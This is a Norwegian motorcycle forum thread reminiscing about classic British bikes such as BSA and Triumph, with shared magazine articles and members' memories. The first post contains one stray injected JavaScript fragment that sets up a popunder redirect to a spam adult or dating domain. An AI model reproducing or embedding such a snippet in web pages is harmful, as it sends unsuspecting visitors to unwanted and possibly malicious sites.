The Glory Days of British Motorbikes

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

The Glory Days of British Motorbikes

Legg inn av dypen »

The Glory Days of British Motorbikes & Cafe' Racers - Classic Triumph - Norton - BSA Motorcycles

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
AJ
Administrator
Innlegg: 37838
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: The Glory Days of British Motorbikes

Legg inn av AJ »

Triumferende Truimph fra 1939_07AUG2011.pdf
Fra tiden før de japanske tok fullstendig kontrollen...
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
AJ
Administrator
Innlegg: 37838
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: The Glory Days of British Motorbikes

Legg inn av AJ »

Ifarta OKTOBER 2012 BSA reportasje.pdf
BSA...
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
dypen
Innlegg: 5231
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: The Glory Days of British Motorbikes

Legg inn av dypen »

Takker for flotte artikler :thumleft
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
AJ
Administrator
Innlegg: 37838
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: The Glory Days of British Motorbikes

Legg inn av AJ »

dypen skrev: 12 nov 2021, 21:27 Takker for flotte artikler :thumleft
Bare hyggelig, det :) .

Kjente på det at jeg svært gjene skule skrevet mer da jeg gjorde saken, men begrenset plass for "ordgyteri" i avisen satte en effektiv stopper for det... ;) .
Sånn er det nemlig å jobbe som journalist, den skrivende yrkesgruppen som antakelig er "pålagt" å skrive minst mulig, paradoksalt nok...
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Gammelsmurfen
Innlegg: 1289
Registrert: 09 nov 2020, 19:05
Motorsykkelen din: BMW F850GS Rally 2022

Re: The Glory Days of British Motorbikes

Legg inn av Gammelsmurfen »

Hadde en nabo på første halvdel av 90-tallet som hadde en gammel fin BSA Rocket i svart og nikkel, han hadde sidevogn til den også og det hendte at den ble brukt på vinteren også. Den gangen saltet de ikke noe særlig, men strødde de mindre veiene i hvert fall.

Brukeravatar
MGR1
Innlegg: 494
Registrert: 08 feb 2013, 16:40
Motorsykkelen din: AJS 500 twin 1955 - Aprilia Pegaso 650 1997
Sted: Norge

Re: The Glory Days of British Motorbikes

Legg inn av MGR1 »

Flotte BSA'er!

Her er en pur ung MGR1 på sin BSA A65 i 1981. Tidsriktig bekledning :)
BSA A65 1981.jpg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
oivindg
Innlegg: 885
Registrert: 20 nov 2019, 21:45
Motorsykkelen din: BMW R1200R (2011)
Sted: Kongsberg

Re: The Glory Days of British Motorbikes

Legg inn av oivindg »

Husker at da jeg var guttunge, så var BSA forbundet med skrekkblandet fryd. En nabo hadde en BSA 650. Det var den kuleste motorsykkelen jeg hadde sett, og jeg syntes lyden var fantastisk. Å få stå på tunet hos naboen når han startet BSA'en var som å være i himmelriket. Skrekken kom fra det at naboen fortalte om en annen BSA-eier som hadde brukket ankelen under start av motorsykkelen fordi "kjiiken" hadde slått tilbake. Dette lå som en liten knute i magen hver gang jeg var tilstede når naboen skulle starte sin BSA. Lettelsen var stor hver gang oppstarten gikk bra. :)

Happy days!
Øivind

Min 2011 BMW R1200R - 2021 blir første hele sesong med lappen. Gleder meg!

Brukeravatar
erik m
Innlegg: 547
Registrert: 30 aug 2012, 23:43
Motorsykkelen din: jawa CZ 350 56 og BMW r1100rs 93
Sted: Oslo

Re: The Glory Days of British Motorbikes

Legg inn av erik m »

Det var endunkerne på 500ccm som var de verste til å sparke tilbake. B33 og 34 fra 50- og 60- tallet; Gold Star måtte du være særs forsiktig med. En kompis sa at du ikke skulel være bekymra om du fant en oljeflekk under sykkelen når den hadde stått en stund. Det var når du IKKE fant flekken du skulel være bekymra!
Men for noen vakre maskiner!
20190814_161314.jpg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Svar